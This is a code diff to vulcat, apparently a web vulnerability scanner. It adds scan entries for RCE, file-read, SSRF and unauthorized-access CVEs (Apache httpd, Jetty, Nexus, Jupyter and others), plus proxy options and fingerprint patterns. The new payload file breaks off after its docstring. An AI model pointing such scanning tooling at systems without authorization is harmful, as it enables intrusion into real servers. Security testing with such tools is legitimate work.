The current web vulnerabilities that support scanning: [Click on]
@@ -26,6 +26,10 @@
+----------------------+--------------------+--------------+------------------------------------------------------------+
| Apache Hadoop | None | unAuth | Hadoop YARN ResourceManager unAuthorized |
+----------------------+--------------------+--------------+------------------------------------------------------------+
+| Apache Httpd | CVE-2021-40438 | SSRF | Apache HTTP Server 2.4.48 mod_proxy SSRF |
+| Apache Httpd | CVE-2021-41773 | FileRead/RCE | Apache HTTP Server 2.4.49 Directory traversal |
+| Apache Httpd | CVE-2021-42013 | FileRead/RCE | Apache HTTP Server 2.4.50 Directory traversal |
++----------------------+--------------------+--------------+------------------------------------------------------------+
| Apache Solr | CVE-2021-27905 | SSRF | Solr SSRF/FileRead |
+----------------------+--------------------+--------------+------------------------------------------------------------+
| Apache Struts2 | S2-001 | RCE | Struts2 Remote code execution |
@@ -77,14 +81,30 @@
+----------------------+--------------------+--------------+------------------------------------------------------------+
| Grafana | CVE-2021-43798 | FileRead | Grafana 8.x Directory traversal |
+----------------------+--------------------+--------------+------------------------------------------------------------+
+| Influxdb | None | unAuth | influxdb unAuthorized |
++----------------------+--------------------+--------------+------------------------------------------------------------+
| Jenkins | CVE-2018-1000861 | RCE | jenkins Remote code execution |
+----------------------+--------------------+--------------+------------------------------------------------------------+
+| Jetty | CVE-2021-28164 | DSinfo | jetty Disclosure information |
+| Jetty | CVE-2021-28169 | DSinfo | jetty Utility Servlets ConcatServlet Disclosure information|
+| Jetty | CVE-2021-34429 | DSinfo | jetty Disclosure information |
++----------------------+--------------------+--------------+------------------------------------------------------------+
+| Jupyter | None | unAuth | Jupyter unAuthorized |
++----------------------+--------------------+--------------+------------------------------------------------------------+
| Keycloak | CVE-2020-10770 | SSRF | request_uri SSRF |
+----------------------+--------------------+--------------+------------------------------------------------------------+
| Landray | CNVD-2021-28277 | FileRead/SSRF| Landray-OA FileRead/SSRF |
+----------------------+--------------------+--------------+------------------------------------------------------------+
+| Mini Httpd | CVE-2018-18778 | FileRead | mini_httpd FileRead |
++----------------------+--------------------+--------------+------------------------------------------------------------+
| mongo-express | CVE-2019-10758 | RCE | Remote code execution |
+----------------------+--------------------+--------------+------------------------------------------------------------+
+| Nexus Repository | CVE-2019-5475 | RCE | 2.x yum Remote code execution |
+| Nexus Repository | CVE-2019-7238 | RCE | 3.x Remote code execution |
+| Nexus Repository | CVE-2019-15588 | RCE | 2019-5475 Bypass |
+| Nexus Repository | CVE-2020-10199 | RCE | 3.x Remote code execution |
+| Nexus Repository | CVE-2020-10204 | RCE | 3.x Remote code execution |
++----------------------+--------------------+--------------+------------------------------------------------------------+
| Nodejs | CVE-2017-14849 | FileRead | Node.js Directory traversal |
| Nodejs | CVE-2021-21315 | RCE | Node.js Remote code execution |
+----------------------+--------------------+--------------+------------------------------------------------------------+
@@ -179,11 +199,15 @@ Options:
The number of threads (default: 2)
--delay=DELAY Delay time/s (default: 1)
--timeout=TIMEOUT Timeout/s (default: 10)
- --http-proxy=HTTP_PROXY
- The HTTP/HTTPS proxy (e.g. --http-proxy
- 127.0.0.1:8080)
--user-agent=UA Customize the User-Agent
- --cookie=COOKIE Add a cookie
+ --cookie=COOKIE Add a cookie (e.g. --cookie "PHPSESSID=123456789")
+ --auth=AUTHORIZATION
+ Add a Authorization (e.g. --auth "Basic
+ YWRtaW46YWRtaW4=")
+
+ Log:
+ Debug information
+
--log=LOG The log level, Optional 1-6 (default: 1) [level 2:
Framework name + Vulnerability number + status code]
[level 3: Level 2 content + request method + request
@@ -191,6 +215,18 @@ Options:
packet] [Level 5: Level 4 content + response header]
[level 6: Level 5 content + response content]
+ Proxy:
+ Proxy server
+
+ --http-proxy=HTTP_PROXY
+ The HTTP/HTTPS proxy (e.g. --http-proxy
+ 127.0.0.1:8080)
+ --socks4-proxy=SOCKS4_PROXY
+ The socks4 proxy(e.g. --socks4-proxy 127.0.0.1:8080)
+ --socks5-proxy=SOCKS5_PROXY
+ The socks5 proxy(e.g. --socks5-proxy 127.0.0.1:8080 or
+ admin:123456@127.0.0.1:8080)
+
Application:
Specify the target type for the scan
@@ -241,10 +277,10 @@ Options:
--list View all payload
Supported target types(Case insensitive):
- AliDruid,nacos,airflow,apisix,flink,solr,struts2,tomcat,appweb,conflue
- nce,cisco,discuz,django,drupal,elasticsearch,f5bigip,fastjson,jenkins,
- keycloak,mongoexpress,nodejs,nodered,showdoc,spring,thinkphp,ueditor,w
- eblogic,webmin,yonyou
+ AliDruid,nacos,airflow,apisix,flink,hadoop,solr,struts2,tomcat,appweb,
+ confluence,cisco,discuz,django,drupal,elasticsearch,f5bigip,fastjson,g
+ itea,gitlab,grafana,jenkins,keycloak,landray,mongoexpress,nodejs,noder
+ ed,rails,showdoc,spring,thinkphp,ueditor,weblogic,webmin,yonyou
```
## language
diff --git a/lib/core/coreScan.py b/lib/core/coreScan.py
index 7aec2f7..e675cd5 100644
--- a/lib/core/coreScan.py
+++ b/lib/core/coreScan.py
@@ -16,6 +16,8 @@
from payloads.ApacheAirflow import airflow
from payloads.ApacheAPISIX import apisix
from payloads.ApacheFlink import flink
+from payloads.ApacheHadoop import hadoop
+from payloads.ApacheHttpd import httpd
from payloads.ApacheSolr import solr
from payloads.ApacheTomcat import tomcat
from payloads.ApacheStruts2 import struts2
@@ -31,12 +33,16 @@
from payloads.Gitea import gitea
from payloads.Gitlab import gitlab
from payloads.Grafana import grafana
-from payloads.ApacheHadoop import hadoop
+from payloads.Influxdb import influxdb
from payloads.Jenkins import jenkins
+from payloads.Jetty import jetty
+from payloads.Jupyter import jupyter
from payloads.Keycloak import keycloak
# from payloads.Kindeditor import kindeditor
from payloads.Landray import landray
+from payloads.MiniHttpd import minihttpd
from payloads.MongoExpress import mongoexpress
+from payloads.Nexus import nexus
from payloads.Nodejs import nodejs
from payloads.NodeRED import nodered
from payloads.RubyOnRails import rails
@@ -79,49 +85,53 @@ def start(self):
if (('http://' not in u[0:10]) and ('https://' not in u[0:10])):
logger.info('red_ex', self.lang['core']['start']['url_error'].format(u))
continue
-
- logger.info('green_ex', self.lang['core']['start']['start'] + u) # ? 提示, 开始扫描当前url
- # * --------------------WAF指纹识别--------------------
- if (not self.no_waf):
- waf_info = waf.identify(u) # * WAF指纹识别
- if waf_info:
- while True:
- if (not self.batch): # * 是否使用默认选项
- logger.info('red', '', print_end='')
- operation = input(self.lang['core']['waf_finger']['waf_find'].format(waf_info)) # * 接收参数
- else:
- logger.info('red', self.lang['core']['waf_finger']['waf_find'].format(waf_info), print_end='')
- operation = 'no' # * 默认选项No
- logger.info('red', 'no', notime=True)
-
- operation = operation.lower() # * 字母转小写
- if operation in ['y', 'yes']: # * 继续扫描
- logger.info('yellow_ex', self.lang['core']['stop']['continue']) # ? 日志, 继续扫描
- break
- elif operation in ['n', 'no']:
- logger.info('yellow_ex', self.lang['core']['stop']['next']) # ? 日志, 下一个
- u = 'next'
- break
- else:
- logger.info('yellow_ex', self.lang['core']['waf_finger']['waf_not_find'])
+ logger.info('green_ex', self.lang['core']['start']['start'] + u) # ? 提示, 开始扫描当前url
- if u == 'next':
+ if check.check_connect(u):
+ # * --------------------WAF指纹识别--------------------
+ if (not self.no_waf):
+ waf_info = waf.identify(u) # * WAF指纹识别
+ if waf_info:
+ while True:
+ if (not self.batch): # * 是否使用默认选项
+ logger.info('red', '', print_end='')
+ operation = input(self.lang['core']['waf_finger']['waf_find'].format(waf_info)) # * 接收参数
+ else:
+ logger.info('red', self.lang['core']['waf_finger']['waf_find'].format(waf_info), print_end='')
+ operation = 'no' # * 默认选项No
+ logger.info('red', 'no', notime=True)
+
+ operation = operation.lower() # * 字母转小写
+ if operation in ['y', 'yes']: # * 继续扫描
+ logger.info('yellow_ex', self.lang['core']['stop']['continue']) # ? 日志, 继续扫描
+ break
+ elif operation in ['n', 'no']:
+ logger.info('yellow_ex', self.lang['core']['stop']['next']) # ? 日志, 下一个
+ u = 'next'
+ break
+ else:
+ logger.info('yellow_ex', self.lang['core']['waf_finger']['waf_not_find'])
+
+ if u == 'next':
+ continue
+ # * --------------------WAF指纹识别--------------------
+
+ # * --------------------框架指纹识别--------------------
+ if ((self.application == 'auto') and (not self.vuln)):
+ logger.info('yellow_ex', self.lang['core']['web_finger']['web'])
+ webapp.stop = self.stop
+ new_app_list = webapp.identify(u)
+ if new_app_list:
+ logger.info('yellow_ex', self.lang['core']['web_finger']['web_find'].format(str(new_app_list)))
+ self.app_list = new_app_list
+ else:
+ logger.info('yellow_ex', self.lang['core']['web_finger']['web_not_find'])
+
+ # * --------------------框架指纹识别--------------------
+ else:
+ logger.info('red', self.lang['core']['start']['unable'] + u) # ? 提示, 无法访问当前url
continue
- # * --------------------WAF指纹识别--------------------
-
- # * --------------------框架指纹识别--------------------
- if ((self.application == 'auto') and (not self.vuln)):
- logger.info('yellow_ex', self.lang['core']['web_finger']['web'])
- webapp.stop = self.stop
- new_app_list = webapp.identify(u)
- if new_app_list:
- logger.info('yellow_ex', self.lang['core']['web_finger']['web_find'].format(str(new_app_list)))
- self.app_list = new_app_list
- else:
- logger.info('yellow_ex', self.lang['core']['web_finger']['web_not_find'])
-
- # * --------------------框架指纹识别--------------------
if self.no_poc:
logger.info('red', self.lang['core']['start']['no_poc'])
diff --git a/lib/initial/config.py b/lib/initial/config.py
index aec9184..e0d9023 100644
--- a/lib/initial/config.py
+++ b/lib/initial/config.py
@@ -9,6 +9,8 @@
from thirdparty.requests import packages
import re
import http.client
+import socket
+import socks
global config
@@ -69,13 +71,36 @@ def __init__(self, args):
'Accept': '*/*',
'Connection': 'close'
}
+
if args.cookie:
args.headers['Cookie'] = args.cookie.lstrip('Cookie: ')
- args.proxies = {
- 'http': args.http_proxy,
- 'https': args.http_proxy
- }
+ if args.authorization:
+ args.headers['Authorization'] = args.authorization.lstrip('Authorization: ')
+
+ if args.http_proxy: # * requests代理
+ args.proxies = {
+ 'http': 'http://' + args.http_proxy,
+ 'https': 'http://' + args.http_proxy
+ }
+ args.proxy = tuple(args.http_proxy.split(':')) # * HackRequests代理
+ else:
+ args.proxies = {}
+ args.proxy = ()
+
+ if args.socks5_proxy: # * socks 5
+ if ('@' in args.socks5_proxy): # * 有无身份验证
+ proxy_5 = args.socks5_proxy.replace('@', ':').split(':')
+ socks.set_default_proxy(socks.SOCKS5, proxy_5[2], int(proxy_5[3]), username=proxy_5[0], password=proxy_5[1])
+ else:
+ proxy_5 = args.socks5_proxy.split(':')
+ socks.set_default_proxy(socks.SOCKS5, proxy_5[0], int(proxy_5[1]))
+ socket.socket = socks.socksocket
+
+ elif args.socks4_proxy: # * socks 4
+ proxy_4 = args.socks4_proxy.split(':')
+ socks.set_default_proxy(socks.SOCKS4, proxy_4[0], int(proxy_4[1]))
+ socket.socket = socks.socksocket
if args.vuln:
args.vuln = args.vuln.lower()
@@ -87,15 +112,14 @@ def __init__(self, args):
'discuz', 'django', 'drupal',
'elasticsearch',
'f5bigip', 'fastjson', 'flink',
- # 'gitea', 'gitlab', 'grafana',
- 'gitea', 'gitlab',
- 'hadoop',
- 'jenkins',
- # 'keycloak', 'kindeditor',
- 'keycloak',
+ 'gitea', 'gitlab', # 'grafana',
+ 'influxdb',
+ 'hadoop', 'httpd',
+ 'jenkins', 'jetty', 'jupyter',
+ 'keycloak', # 'kindeditor',
'landray',
- 'mongoexpress',
- 'nacos', 'nodejs', 'nodered',
+ 'minihttpd', 'mongoexpress',
+ 'nexus', 'nacos', 'nodejs', 'nodered',
'rails',
'showdoc', 'solr', 'struts2', 'spring',
'thinkphp', 'tomcat',
diff --git a/lib/initial/language.py b/lib/initial/language.py
index d21eefb..fd389b9 100644
--- a/lib/initial/language.py
+++ b/lib/initial/language.py
@@ -26,11 +26,23 @@ def language():
'thread': 'The number of threads (default: 2)',
'delay': 'Delay time/s (default: 1)',
'timeout': 'Timeout/s (default: 10)',
- 'http_proxy': 'The HTTP/HTTPS proxy (e.g. --http-proxy 127.0.0.1:8080)',
'user_agent': 'Customize the User-Agent',
- 'cookie': 'Add a cookie',
+ 'cookie': 'Add a cookie (e.g. --cookie "PHPSESSID=123456789")',
+ 'Authorization': 'Add a Authorization (e.g. --auth "Basic YWRtaW46YWRtaW4=")',
+ },
+ 'log_help': {
+ 'title': 'Log',
+ 'name': 'Debug information',
'log': 'The log level, Optional 1-6 (default: 1) [level 2: Framework name + Vulnerability number + status code] [level 3: Level 2 content + request method + request target +POST data] [level 4: Level 2 content + request packet] [Level 5: Level 4 content + response header] [level 6: Level 5 content + response content]'
},
+ 'proxy_help': {
+ 'title': 'Proxy',
+ 'name': 'Proxy server',
+ 'http_proxy': 'The HTTP/HTTPS proxy (e.g. --http-proxy 127.0.0.1:8080)',
+ 'socks4_proxy': 'The socks4 proxy(e.g. --socks4-proxy 127.0.0.1:8080)',
+ 'socks5_proxy': 'The socks5 proxy(e.g. --socks5-proxy 127.0.0.1:8080 or admin:123456@127.0.0.1:8080)',
+
+ },
'application_help': {
'title': 'Application',
'name': 'Specify the target type for the scan',
@@ -141,11 +153,22 @@ def language():
'thread': '线程数 (默认: 2)',
'delay': '延迟时间/秒 (默认: 1)',
'timeout': '超时时间/秒 (默认: 10)',
- 'http_proxy': 'http/https代理 (如: --http-proxy 127.0.0.1:8080)',
'user_agent': '自定义User-Agent',
- 'cookie': '添加cookie',
+ 'cookie': '添加cookie (如: --cookie "PHPSESSID=123456789")',
+ 'Authorization': '添加Authorization (如: --auth "Basic YWRtaW46YWRtaW4=")'
+ },
+ 'log_help': {
+ 'title': '日志',
+ 'name': '运行时输出的debug信息',
'log': '日志等级, 可选1-6 (默认: 1) [日志2级: 框架名称+漏洞编号+状态码] [日志3级: 2级内容+请求方法+请求目标+POST数据] [日志4级: 2级内容+请求数据包] [日志5级: 4级内容+响应头] [日志6级: 5级内容+响应内容]'
},
+ 'proxy_help': {
+ 'title': 'Proxy',
+ 'name': '代理',
+ 'http_proxy': 'http/https代理 (如: --http-proxy 127.0.0.1:8080)',
+ 'socks4_proxy': 'socks4代理(如: --socks4-proxy 127.0.0.1:8080)',
+ 'socks5_proxy': 'socks5代理(如: --socks5-proxy 127.0.0.1:8080 或 admin:123456@127.0.0.1:8080)',
+ },
'application_help': {
'title': 'Application',
'name': '指定扫描的目标类型',
diff --git a/lib/initial/list.py b/lib/initial/list.py
index 9311be5..db6ccbc 100644
--- a/lib/initial/list.py
+++ b/lib/initial/list.py
@@ -74,6 +74,23 @@ def list():
'description': 'Hadoop YARN ResourceManager 未授权访问'
}
],
+ 'Apache Httpd': [
+ {
+ 'vul_id': 'CVE-2021-40438',
+ 'type': 'SSRF',
+ 'description': 'Apache HTTP Server 2.4.48 mod_proxy SSRF '
+ },
+ {
+ 'vul_id': 'CVE-2021-41773',
+ 'type': 'FileRead/RCE',
+ 'description': 'Apache HTTP Server 2.4.49 路径遍历'
+ },
+ {
+ 'vul_id': 'CVE-2021-42013',
+ 'type': 'FileRead/RCE',
+ 'description': 'Apache HTTP Server 2.4.50 路径遍历'
+ }
+ ],
'Apache Solr': [
{
'vul_id': 'CVE-2021-27905',
@@ -284,6 +301,13 @@ def list():
'description': 'Grafana 8.x 插件模块路径遍历'
},
],
+ 'Influxdb': [
+ {
+ 'vul_id': 'None',
+ 'type': 'unAuth',
+ 'description': 'influxdb 未授权访问'
+ },
+ ],
'Jenkins': [
{
'vul_id': 'CVE-2018-1000861',
@@ -291,6 +315,30 @@ def list():
'description': 'jenkins 远程命令执行'
}
],
+ 'Jetty': [
+ {
+ 'vul_id': 'CVE-2021-28164',
+ 'type': 'DSinfo',
+ 'description': 'jetty 模糊路径信息泄露'
+ },
+ {
+ 'vul_id': 'CVE-2021-28169',
+ 'type': 'DSinfo',
+ 'description': 'jetty Utility Servlets ConcatServlet 双重解码信息泄露'
+ },
+ {
+ 'vul_id': 'CVE-2021-34429',
+ 'type': 'DSinfo',
+ 'description': 'jetty 模糊路径信息泄露'
+ }
+ ],
+ 'Jupyter': [
+ {
+ 'vul_id': 'None',
+ 'type': 'unAuth',
+ 'description': 'Jupyter 未授权访问'
+ }
+ ],
'Keycloak': [
{
'vul_id': 'CVE-2020-10770',
@@ -313,6 +361,13 @@ def list():
'description': '蓝凌OA 任意文件读取/SSRF'
}
],
+ 'Mini Httpd': [
+ {
+ 'vul_id': 'CVE-2018-18778',
+ 'type': 'FileRead',
+ 'description': 'mini_httpd 任意文件读取'
+ }
+ ],
'mongo-express': [
{
'vul_id': 'CVE-2019-10758',
@@ -320,6 +375,33 @@ def list():
'description': '未授权远程代码执行'
}
],
+ 'Nexus Repository': [
+ {
+ 'vul_id': 'CVE-2019-5475',
+ 'type': 'RCE',
+ 'description': '2.x yum插件 远程命令执行'
+ },
+ {
+ 'vul_id': 'CVE-2019-7238',
+ 'type': 'RCE',
+ 'description': '3.x 远程命令执行'
+ },
+ {
+ 'vul_id': 'CVE-2019-15588',
+ 'type': 'RCE',
+ 'description': '2019-5475的绕过'
+ },
+ {
+ 'vul_id': 'CVE-2020-10199',
+ 'type': 'RCE',
+ 'description': '3.x 远程命令执行'
+ },
+ {
+ 'vul_id': 'CVE-2020-10204',
+ 'type': 'RCE',
+ 'description': '3.x 远程命令执行'
+ }
+ ],
'Nodejs': [
{
'vul_id': 'CVE-2017-14849',
diff --git a/lib/initial/parse.py b/lib/initial/parse.py
index 6e4a82f..7321c83 100644
--- a/lib/initial/parse.py
+++ b/lib/initial/parse.py
@@ -19,7 +19,7 @@ def parse():
python3 vulcat.py -u https://www.example.com/ -a tomcat -v CVE-2017-12615
python3 vulcat.py -f url.txt -t 10
python3 vulcat.py --list
-''', version='vulcat.py-1.1.2\n')
+''', version='vulcat.py-1.1.3\n')
# * 指定目标
target = parser.add_option_group(lang['target_help']['title'], lang['target_help']['name'])
target.add_option('-u', '--url', type='string', dest='url', default=None, help=lang['target_help']['url'])
@@ -31,16 +31,25 @@ def parse():
optional.add_option('-t', '--thread', type='int', dest='thread', default=2, help=lang['optional_help']['thread'])
optional.add_option('--delay', type='float', dest='delay', default=1, help=lang['optional_help']['delay'])
optional.add_option('--timeout', type='int', dest='timeout', default=10, help=lang['optional_help']['timeout'])
- optional.add_option('--http-proxy', type='string', dest='http_proxy', default=None, help=lang['optional_help']['http_proxy'])
optional.add_option('--user-agent', type='string', dest='ua', default='Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko/20100101 Firefox/96.0', help=lang['optional_help']['user_agent'])
optional.add_option('--cookie', type='string', dest='cookie', default=None, help=lang['optional_help']['cookie'])
- optional.add_option('--log', type='int', dest='log', default=1, help=lang['optional_help']['log'])
+ optional.add_option('--auth', type='string', dest='authorization', default=None, help=lang['optional_help']['Authorization'])
+ # optional.add_option('--random-ua', dest='random_ua', action='store_true', help='')
+
+ # * 日志参数
+ log = parser.add_option_group(lang['log_help']['title'], lang['log_help']['name'])
+ log.add_option('--log', type='int', dest='log', default=1, help=lang['log_help']['log'])
+
+ # * 代理
+ proxy = parser.add_option_group(lang['proxy_help']['title'], lang['proxy_help']['name'])
+ proxy.add_option('--http-proxy', type='string', dest='http_proxy', default=None, help=lang['proxy_help']['http_proxy'])
+ proxy.add_option('--socks4-proxy', type='string', dest='socks4_proxy', default=None, help=lang['proxy_help']['socks4_proxy'])
+ proxy.add_option('--socks5-proxy', type='string', dest='socks5_proxy', default=None, help=lang['proxy_help']['socks5_proxy'])
# * 指定目标类型
application = parser.add_option_group(lang['application_help']['title'], lang['application_help']['name'])
application.add_option('-a', '--application', type='string', dest='application', default='auto', help=lang['application_help']['application'])
application.add_option('-v', '--vuln', type='string', dest='vuln', default=None, help=lang['application_help']['vuln'])
- # application.add_option('-c', '--command', type='string', dest='command', default=None, help='配合exp执行自定义命令')
# * 第三方api, 例如dnslog/ceye
api = parser.add_option_group(lang['api_help']['title'], lang['api_help']['name'])
@@ -50,6 +59,7 @@ def parse():
save = parser.add_option_group(lang['save_help']['title'], lang['save_help']['name'])
save.add_option('--output-text', type='string', dest='txt_filename',default=None, help=lang['save_help']['output_text'])
save.add_option('--output-json', type='string', dest='json_filename',default=None, help=lang['save_help']['output_json'])
+ # save.add_option('--output-html', type='string', dest='html_filename', default=None, help='')
# * 通用参数
general = parser.add_option_group(lang['general_help']['title'], lang['general_help']['name'])
diff --git a/lib/plugins/Exp.py b/lib/plugins/Exp.py
deleted file mode 100644
index 67d4600..0000000
--- a/lib/plugins/Exp.py
+++ /dev/null
@@ -1,21 +0,0 @@
-#!/usr/bin/env python3
-# -*- coding:utf-8 -*-
-
-'''
- 插件:
- POC转EXP
-'''
-
-from lib.api.dns import dns
-from lib.initial.config import config
-from lib.tool.md5 import md5, random_md5
-from lib.tool.logger import logger
-from lib.tool.thread import thread
-from lib.tool import check
-from lib.tool import head
-from thirdparty import requests
-from time import sleep
-import re
-
-def exp(result):
- pass
\ No newline at end of file
diff --git a/lib/plugins/fingerprint/webapp.py b/lib/plugins/fingerprint/webapp.py
index 346e528..5ccf14c 100644
--- a/lib/plugins/fingerprint/webapp.py
+++ b/lib/plugins/fingerprint/webapp.py
@@ -159,6 +159,24 @@ def __init__(self):
r'Apache Flink Web Dashboard'
]
},
+ {
+ 'name': 'httpd',
+ 'path': '',
+ 'data': '',
+ 'fingerprint': [
+ r'The requested URL was not found on this server\.',
+ r'You don\'t have permission to access this resource\.',
+ r'The server is temporarily unable to service your request due to maintenance downtime or capacity problems\. Please try again later\.',
+ r'Apache Tomcat/.*',
+ r'Home',
+ r'Copyright.*\d{0,4}-\d{0,4} Apache Software Foundation\. All Rights Reserved
',
+ r'These icons were originally made for Mosaic for X.*If you\'d like to contribute additions to this set.*http://httpd\.apache\.org/docs-project',
+ r'Apache2 Debian Default Page: It works.*Apache2 Debian Default Page',
+ r'Apache2 server after installation on Debian systems.*it means that the Apache HTTP server installed',
+ r'The configuration layout for an Apache2 web server installation on Debian systems is as follows:',
+ r'Apache2 package with Debian\. However, check.*existing bug reports'
+ ]
+ },
{
'name': 'solr',
'path': '',
@@ -188,7 +206,9 @@ def __init__(self):
'path': '',
'data': '',
'fingerprint': [
- r'Apache Tomcat/.*'
+ r'Apache Tomcat/.*',
+ r'Home',
+ r'Copyright.*\d{0,4}-\d{0,4} Apache Software Foundation\. All Rights Reserved
'
]
},
{
@@ -364,6 +384,24 @@ def __init__(self):
r'Welcome to Jenkins!
'
]
},
+ {
+ 'name': 'jetty',
+ 'path': '',
+ 'data': '',
+ 'fingerprint': [
+ r'
Powered by Jetty:// .{0,30}
'
+ ]
+ },
+ {
+ 'name': 'jupyter',
+ 'path': '',
+ 'data': '',
+ 'fingerprint': [
+ r'Jupyter Notebook requires JavaScript',
+ r"",
+ r'Currently running Jupyter processes'
+ ]
+ },
# {
# 'name': 'keycloak',
# 'path': '',
@@ -389,6 +427,14 @@ def __init__(self):
r"'lui': 'sys/ui/js'"
]
},
+ {
+ 'name': 'minihttpd',
+ 'path': '',
+ 'data': '',
+ 'fingerprint': [
+ r'mini_httpd/.{0,40}'
+ ]
+ },
{
'name': 'mongoexpress',
'path': '',
@@ -400,6 +446,21 @@ def __init__(self):
r'Mongo Express
'
]
},
+ {
+ 'name': 'nexus',
+ 'path': '',
+ 'data': '',
+ 'fingerprint': [
+ r'Nexus Repository Manager',
+ r'Sonatype Nexus',
+ r'',
+ r'',
+ r'',
+ r'You are using a version of Internet Explorer that is not supported\.
See the '
+ ]
+ },
{
'name': 'nodejs',
'path': '/404',
diff --git a/lib/report/output.py b/lib/report/output.py
index 561d7e3..d5016b0 100644
--- a/lib/report/output.py
+++ b/lib/report/output.py
@@ -6,6 +6,7 @@
from lib.tool.timed import nowtime_year
from lib.tool.logger import logger
from thirdparty import requests
+from thirdparty import HackRequests
# from lib.plugins.Exp import exp
import json
import http.client
@@ -83,6 +84,8 @@ def output_json(results, filename, lang):
for key in result_info.keys():
if type(result_info[key]) == requests.models.Response:
result_info[key] = output_res(key, result_info[key], iscolor=False)
+ elif type(result_info[key]) == HackRequests.response:
+ result_info[key] = output_Hackres(key, result_info[key], iscolor=False)
results_info_list.append(json.dumps(result_info, indent=4) + '\n')
results_info_list = set(results_info_list)
@@ -127,6 +130,9 @@ def output_vul_info_color(result):
elif value_type == requests.models.Response: # * Response输出方式
result_info += output_res(key, value)
+ elif value_type == HackRequests.response:
+ result_info += output_Hackres(key, value) # * HackResponse输出方式
+
return result_info
def output_vul_info(result):
@@ -146,6 +152,9 @@ def output_vul_info(result):
elif value_type == requests.models.Response:
result_info += output_res(key, value, iscolor=False)
+ elif value_type == HackRequests.response:
+ result_info += output_Hackres(key, value, iscolor=False)
+
return result_info
def output_str(key, value, iscolor=True):
@@ -247,4 +256,30 @@ def output_res(key, res, iscolor=True):
except:
return info_res
+ return info_res
+
+def output_Hackres(key, res, iscolor=True):
+ ''' 接收一个HackRequests结果, 返回一个http数据包 '''
+ info_res = ''
+
+ if iscolor:
+ try:
+ info_res += color.yellow_ex(key) + ':'
+ info_res += color.red_ex(' [Request')
+ info_res += color.black_ex('\n' + res.log.get('request'))
+
+ info_res += color.red_ex(']')
+ info_res += color.reset('\n ')
+ except:
+ return info_res
+ else:
+ try:
+ info_res += key + ':'
+ info_res += ' [Request'
+ info_res += '\n' + res.log.get('request').replace('\n', '')
+
+ info_res += ']\n '
+ except:
+ return info_res
+
return info_res
\ No newline at end of file
diff --git a/lib/tool/check.py b/lib/tool/check.py
index ea658d2..a914319 100644
--- a/lib/tool/check.py
+++ b/lib/tool/check.py
@@ -34,8 +34,8 @@ def check_connect(url):
except requests.ConnectionError:
return False
except Exception as e:
- return False
# print(e)
+ return False
def check_res(res, md):
''' 检查poc误报
diff --git a/lib/tool/logger.py b/lib/tool/logger.py
index 617dda5..bf12b95 100644
--- a/lib/tool/logger.py
+++ b/lib/tool/logger.py
@@ -48,10 +48,19 @@ def logging_3(self, vul_info, status_code, res):
info_3 = self.logging_2(vul_info, status_code)
try:
- info_3 += color.red_ex(' [' + res.request.method + ' ')
- info_3 +=color.black_ex(res.request.url) + color.red_ex(']')
- if vul_info['data']:
- info_3 += color.red_ex(' [DATA ') + color.black_ex(res.request.body) + color.red_ex(']')
+ # * HackRequests
+ if (str(type(res)) == ""):
+ info_3 += color.red_ex(' [' + res.method + ' ')
+ info_3 +=color.black_ex(res.url) + color.red_ex(']')
+ if vul_info['data']:
+ info_3 += color.red_ex(' [DATA ') + color.black_ex(vul_info['data']) + color.red_ex(']')
+ return info_3
+ # * requests
+ else:
+ info_3 += color.red_ex(' [' + res.request.method + ' ')
+ info_3 +=color.black_ex(res.request.url) + color.red_ex(']')
+ if vul_info['data']:
+ info_3 += color.red_ex(' [DATA ') + color.black_ex(res.request.body) + color.red_ex(']')
except:
return info_3
@@ -60,21 +69,32 @@ def logging_3(self, vul_info, status_code, res):
def logging_4(self, vul_info, status_code, res):
''' 日志4级, (框架名称+状态码+漏洞编号)+请求数据包 '''
info_4 = self.logging_2(vul_info, status_code)
+
try:
- info_4 += color.red_ex(' [Request')
- info_4 += color.black_ex('\n' + res.request.method + ' ' + res.request.path_url + ' ' + http.client.HTTPConnection._http_vsn_str)
- info_4 += color.black_ex('\n' + 'Host' + ': ' + self.get_domain(res.request.url))
-
- for key, value in res.request.headers.items():
- info_4 += color.black_ex('\n' + key + ': ' + value)
- if res.request.body:
- if (type(res.request.body) == bytes):
- info_4 += color.black_ex('\n\n' + res.request.body.decode())
- else:
- info_4 += color.black_ex('\n\n' + res.request.body)
-
- info_4 += color.red_ex('\n]')
- info_4 += color.reset('')
+ # * HackRequests
+ if (str(type(res)) == ""):
+ info_4 += color.red_ex(' [Request')
+ info_4 += color.black_ex('\n' + res.log.get('request'))
+
+ info_4 += color.red_ex('\n]')
+ info_4 += color.reset('')
+ return info_4
+ # * requests
+ else:
+ info_4 += color.red_ex(' [Request')
+ info_4 += color.black_ex('\n' + res.request.method + ' ' + res.request.path_url + ' ' + http.client.HTTPConnection._http_vsn_str)
+ info_4 += color.black_ex('\n' + 'Host' + ': ' + self.get_domain(res.request.url))
+
+ for key, value in res.request.headers.items():
+ info_4 += color.black_ex('\n' + key + ': ' + value)
+ if res.request.body:
+ if (type(res.request.body) == bytes):
+ info_4 += color.black_ex('\n\n' + res.request.body.decode())
+ else:
+ info_4 += color.black_ex('\n\n' + res.request.body)
+
+ info_4 += color.red_ex('\n]')
+ info_4 += color.reset('')
except:
return info_4
return info_4
@@ -97,11 +117,20 @@ def logging_6(self, vul_info, status_code, res):
''' 日志6级, (框架名称+状态码+漏洞编号)+请求包+响应头+响应内容 '''
res.encoding = 'utf-8'
info_6 = self.logging_5(vul_info, status_code, res)
+
try:
- info_6 = info_6[:-1]
- info_6 += color.black_ex('\n\n' + res.text)
+ # * HackRequests
+ if (str(type(res)) == ""):
+ info_6 = info_6[:-1]
+ info_6 += color.black_ex('\n\n' + res.text())
+
+ info_6 += color.red_ex('\n]')
+ # * requests
+ else:
+ info_6 = info_6[:-1]
+ info_6 += color.black_ex('\n\n' + res.text)
- info_6 += color.red_ex('\n]')
+ info_6 += color.red_ex('\n]')
except:
return info_6
return info_6
diff --git a/payloads/ApacheHttpd.py b/payloads/ApacheHttpd.py
new file mode 100644
index 0000000..97a33b1
--- /dev/null
+++ b/payloads/ApacheHttpd.py
@@ -0,0 +1,314 @@
+#!/usr/bin/env python3
+# -*- coding:utf-8 -*-
+
+'''
+httpd是Apache超文本传输协议(HTTP)服务器的主程序: https://httpd.apache.org/download.cgi
+ Apache httpd扫描类:
+ 1. Apache httpd 2.4.48 mod_proxy SSRF
+ CVE-2021-40438
+ Payload: https://vulhub.org/#/environments/httpd/CVE-2021-40438/
+
+ 2. Apache httpd 2.4.49 路径遍历
+ CVE-2021-41773
+ Payload: https://vulhub.org/#/environments/httpd/CVE-2021-41773/
